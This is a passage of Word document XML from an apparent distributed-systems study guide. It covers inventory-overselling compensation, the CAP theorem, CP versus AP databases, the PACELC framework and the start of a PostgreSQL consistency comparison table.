        <w:t xml:space="preserve">  T=1: User A buys on Replica 1 → inventory = 0 (Replica 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CC5272" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  T=2: User B buys on Replica 2 → inventory = 0 (Replica 2) ← OVERSOLD!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218386FA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDDFB10" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  When replicas sync: both see inventory went to -1. CONFLICT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F57146" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0769CF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Compensation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D73332A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Detect: inventory &lt; 0 (background process checks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477ED3F5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Compensate: notify User B "Sorry, item sold out. Full refund issued."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67964806" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B560F36" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>This is how real e-commerce works at scale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9235D9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Airlines oversell too — and compensate with rebooking + vouchers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2728BE9E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:pict w14:anchorId="447DEA74">
          <v:rect id="_x0000_i6043" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="612585BE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. The CAP Theorem — Formal Context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7788BBC3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.1 CAP Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53981DB4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB85198" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>In a distributed data store, during a NETWORK PARTITION, you can only guarantee:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731EE778" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Consistency (C): Every read returns the most recent write.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A2C9BA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Availability (A): Every request receives a non-error response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1721A40A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009EC158" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>You CANNOT have both C and A during a partition (P).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656BF8CD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t>You must choose: CP or AP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A34B446" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="52F4EAFF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Note: "P" is not optional — network partitions WILL happen in any distributed system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E8255C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">      CAP really says: "When a partition occurs, choose C or A."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEE0368" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.2 CP Systems (Choose Consistency, Sacrifice Availability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72055D1B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D1DB14" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>During partition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CE7B49" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Nodes that can't reach quorum → REFUSE to serve reads/writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275C8460" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  System is partially unavailable, but never returns stale data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234F1D16" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="2D1B900A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15718835" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  - ZooKeeper, etcd, Consul (coordination services)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F83120D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  - Google Spanner (strongly consistent, global)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22584A6D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  - CockroachDB (serializable, Raft-based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302BF8F0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  - HBase (strong consistency, dependent on ZooKeeper)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F9D1A7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  - PostgreSQL with synchronous replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ECAB91" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7EA07C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Behavior during partition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDF817A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Client: "Write X=5"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2276E34A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  System: "Sorry, can't reach quorum. Try again later." (503/timeout)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FA49AD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.3 AP Systems (Choose Availability, Sacrifice Consistency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE949BD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BEB3F8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>During partition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540B28E7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  All nodes continue to serve reads AND writes (using local data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2D10C4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Different nodes may return different values for the same key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE909CB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  After partition heals → reconciliation/convergence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79297B5F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="476EE86B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D722EC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  - Cassandra (with consistency level ONE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C63673D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  - DynamoDB (eventually consistent reads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7C6F25" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  - CouchDB (multi-master with conflict resolution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC0AC11" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  - DNS (propagation delays, caches, eventual convergence)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3695E8E9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  - Riak (siblings, vector clocks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3014F94E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="2FACE3D4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Behavior during partition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AD023A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Client to Node A: "Write X=5" → "OK" (local write)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063B261E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Client to Node B: "Read X" → returns 3 (old value — Node B hasn't received 5 yet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26320579" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Partition heals → Node B gets X=5 → converges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6808ABC0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.4 PACELC — The More Useful Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB1D8D1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D78B43" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>CAP only describes behavior DURING partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C06722A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>What about during normal operation (no partition)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E569384" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="6A661C45" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>PACELC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5783CA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  IF Partition → choose Availability or Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A67DED5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  ELSE (normal operation) → choose Latency or Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDC7449" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="4D65E55E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>PA/EL: During partition → Available; Else → Low latency (Cassandra, DynamoDB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591D209D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>PC/EC: During partition → Consistent; Else → Consistent (Spanner, CockroachDB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D78FC3A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>PA/EC: During partition → Available; Else → Consistent (unusual)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35712B11" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>PC/EL: During partition → Consistent; Else → Low latency (rare)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518DF787" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="4E5DD367" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t>Most practical systems are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0083FCB3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  PA/EL: Sacrifice consistency for performance always (Cassandra, Dynamo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6282102E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  PC/EC: Sacrifice latency for correctness always (Spanner, CockroachDB, etcd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B3948C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:pict w14:anchorId="2D984074">
          <v:rect id="_x0000_i6044" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E568A04" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Consistency in Specific Technologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F9760C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.1 Comparison Table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45"/>
        <w:gridCol w:w="1763"/>
        <w:gridCol w:w="3688"/>
        <w:gridCol w:w="2054"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="4B75439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3285D9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C5B1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>System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45A75B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C5B1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Default Consistency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321982" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C5B1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Tunable?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098D0F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C5B1F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="19AEABB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AF4BE6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>PostgreSQL (single)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FFB868" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Strong (ACID)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523F61" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>N/A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563EA9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Single node</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="368DD0E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FF6366" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>PostgreSQL (sync replica)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9535EB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Strong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424780" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Per-transaction (synchronous_commit)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BDA5C8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>Synchronous WAL replication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w14:paraId="22CC805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9439CE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
              <w:t>PostgreSQL (async replica)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7A98C2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
            <w:r w:rsidRPr="005C5B1F">
